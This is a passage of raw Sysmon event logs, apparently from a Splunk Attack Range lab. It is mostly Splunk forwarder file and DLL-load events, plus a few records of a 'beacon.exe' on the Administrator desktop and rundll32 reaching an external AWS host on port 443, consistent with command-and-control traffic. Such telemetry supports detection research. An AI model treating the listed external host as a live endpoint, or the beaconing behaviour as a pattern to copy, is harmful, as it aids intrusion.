Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6659871AA67822469FBEC730DB30842,SHA256=8427F5BB2956DA57B38DE95D60C0C0293B12929594678073ECBAEC99B6C7E201falsetrue 23542300x800000000000000021219563Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:02.680{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D46022C9CCF9B0EB585EA774D7B14A0,SHA256=35C0527BD1984FB04CD6F036F51FCC404950CEB5158FA3C256C15919AE201323,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219564Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:03.680{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4D75ADDCAB9D17402A8370D61826DB5,SHA256=7A3B42050769E7302F175A8A85F770D68BB9612ABFC72F5A87E6287ED82D13DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345269Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:34.921{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local54540-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 11241100x800000000000000057345268Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:03.573{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345267Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:03.572{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA2670C9F3CF9A892A8F363AA484F0ED,SHA256=78B8F9DC3DD9784383414CA6E45D96A97275203E4BDF8FAF6139244EE135DB3Cfalsetrue 11241100x800000000000000057345266Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:03.353{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345265Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:03.353{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77CAC8DC248952D72F744474D1E2AD79,SHA256=9B94C9DAEA711F37E9AD77F5F40239FFAA392EEC84A2B3CF8396FD6289EA7E7Dfalsetrue 23542300x800000000000000021219565Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:04.680{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4326054BF18C29E7E9499583E9E4FFB,SHA256=E6F98B3AF3608D7F32A6EBD6B15BDCF39BB207862F9475757E5C7E9B36C8CE0F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345271Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:04.372{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345270Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:04.372{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4330727C2D62E176F9B56271AD44C6F5,SHA256=3769BBFC125C934E9BDCD1C838DC0147BA997BE68ED735205B86C9C2E9A287D7falsetrue 23542300x800000000000000021219569Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:05.695{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=745A51B51DBABC290066457F6090FDB8,SHA256=B1788562E040B30E612BFB41B84733EAC2E0F349AF279C9FF0E527E9E7AACB65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345276Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:36.521{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54541-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345275Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:05.389{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345274Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:05.389{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96C4B16E61C1C3F2159EC370088F2E49,SHA256=3D29A287D51266837D6143E647EDC48856DFDAA600DE244CC51730051D2959DCfalsetrue 354300x800000000000000021219568Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:52.476{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64321-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219567Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:05.055{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73C28AE6A20DDBC63E2855820BDCA4D5,SHA256=77A6666364560040C7220361462B8D0A6B2C7CF56CA99AAB8EEF66C9C1C77396,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219566Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:05.055{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4FBC6B3DC780E6A0E71CF9E4017D175F,SHA256=033123DB806FBE14E5FFAF18015CD3238CF015159EE45A0BB478ABE9BDBCA0E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345273Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:05.189{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345272Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:05.189{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=312C7C28BAFCCBFADD461C937D948494,SHA256=1D4F100F8F1E9651CF72D800DE8478A0CF2443F0AABDBDF30A2B98A9EA377B2Dfalsetrue 23542300x800000000000000021219570Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:06.727{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C7DCE0CB581EF8BC7D2CA8793D1EDA2,SHA256=3E6E146E4D580BB17BF733984ED2D96B2B50201697858050F1F8E009703EF352,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345280Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:06.389{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345279Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:06.389{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2BC4481875D07BFE97FF08716F03182,SHA256=B7DB7CF6773FCF55D525A914BBD4FE82688356E6312B2E1813790F55006A015Dfalsetrue 12241200x800000000000000057345278Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:17:06.120{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057345277Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:17:06.120{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 23542300x800000000000000021219572Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:07.744{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=486D6D61FC67F8FE5BF3AB44788ACDBB,SHA256=BA46A3A430C38ED37EE5612D68BBFFDE0A1A0173412CD7BEEAA3FD8F15637EB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345336Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:38.473{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54542-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 734700x800000000000000057345335Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.836{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057345334Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.836{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057345333Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.836{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057345332Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:07.836{8B6011A9-5B43-618E-3FF3-04000000F101}2272\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057345331Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.836{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057345330Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:07.836{8B6011A9-5B43-618E-3FF3-04000000F101}2272\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057345329Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.836{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057345328Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.836{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057345327Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.836{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057345326Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.836{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057345325Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057345324Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057345323Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057345322Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057345321Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057345320Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057345319Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057345318Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057345317Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057345316Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057345315Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057345314Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057345313Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057345312Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057345311Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057345310Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057345309Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057345308Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057345307Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057345306Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:07.820{8B6011A9-5B43-618E-3FF3-04000000F101}2272C:\Program 